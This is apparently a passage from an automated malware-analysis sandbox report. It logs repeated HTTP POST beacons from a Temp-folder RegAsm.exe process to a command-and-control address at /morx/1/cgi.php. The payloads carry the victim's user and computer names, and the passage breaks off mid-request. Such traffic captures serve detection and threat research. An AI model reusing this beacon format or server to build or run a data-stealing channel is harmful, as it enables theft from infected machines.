                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:14.391398907 CET1165OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:14.464921951 CET1165OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:14.558085918 CET1166INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:13 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        180192.168.2.2249347185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:17.070971966 CET1379OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:17.136715889 CET1379OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:17.241789103 CET1379INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:16 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        181192.168.2.2249348185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:17.441718102 CET1380OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:17.512903929 CET1380OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:17.595690966 CET1381INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:16 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        182192.168.2.2249349185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:17.814657927 CET1381OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:17.886547089 CET1382OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:17.974678993 CET1382INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:17 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        183192.168.2.2249350185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:18.170245886 CET1383OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:18.245968103 CET1383OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:18.342972994 CET1383INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:17 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        184192.168.2.2249351185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:18.546783924 CET1384OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:18.621004105 CET1384OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:18.726488113 CET1385INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:17 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        185192.168.2.2249352185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:18.940629005 CET1385OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:19.011570930 CET1386OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:19.100817919 CET1386INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:18 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        186192.168.2.2249353185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:19.314073086 CET1387OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:19.386976957 CET1387OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:19.472804070 CET1387INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:18 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        187192.168.2.2249354185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:19.678881884 CET1388OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:19.746011019 CET1388OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:19.836988926 CET1389INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:18 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        188192.168.2.2249355185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:20.060760021 CET1389OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:20.136992931 CET1390OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:20.222455978 CET1390INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:19 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        189192.168.2.2249356185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:20.437124968 CET1391OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:20.511753082 CET1391OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:20.607773066 CET1391INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:19 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        19192.168.2.2249186185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:14.788464069 CET1166OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:14.855834007 CET1167OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:14.954180002 CET1167INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:14 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        190192.168.2.2249357185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:20.817266941 CET1392OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:20.886699915 CET1392OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:20.984601021 CET1393INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:20 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        191192.168.2.2249358185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:21.198559999 CET1393OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:21.277508974 CET1394OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:21.387078047 CET1394INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:20 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        192192.168.2.2249359185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:07:21.572190046 CET1395OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:07:21.636636019 CET1395OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:07:21.741503954 CET1395INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:07:20 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        2192.168.2.2249169185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:08.163208961 CET1144OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 176
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:08.230293036 CET1144OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: 'ckav.ruAlbus216554ALBUS-PC+0DE4229FCF97F5879F50F8FD31K2v2
                                                                                        Jan 5, 2021 19:06:08.331588984 CET1145INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:07 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 15
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        20192.168.2.2249187185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:15.165872097 CET1168OUTPOST /morx/1/cgi.php HTTP/1.0
                                                                                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                                        Host: 185.206.215.56
                                                                                        Accept: */*
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Encoding: binary
                                                                                        Content-Key: 598F9AF4
                                                                                        Content-Length: 149
                                                                                        Connection: close
                                                                                        Jan 5, 2021 19:06:15.246450901 CET1168OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 35 00 35 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                                        Data Ascii: (ckav.ruAlbus216554ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                                        Jan 5, 2021 19:06:15.352806091 CET1168INHTTP/1.0 404 Not Found
                                                                                        Date: Tue, 05 Jan 2021 18:06:14 GMT
                                                                                        Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                                                        X-Powered-By: PHP/5.6.40
                                                                                        Status: 404 Not Found
                                                                                        Content-Length: 23
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                                        Data Ascii: File not found.


                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                        21192.168.2.2249188185.206.215.5680C:\Users\user\AppData\Local\Temp\RegAsm.exe
                                                                                        TimestampkBytes transferredDirectionData
                                                                                        Jan 5, 2021 19:06:15.552401066 CET1169OUTPOST /morx/1/cgi.php HTTP/1.0
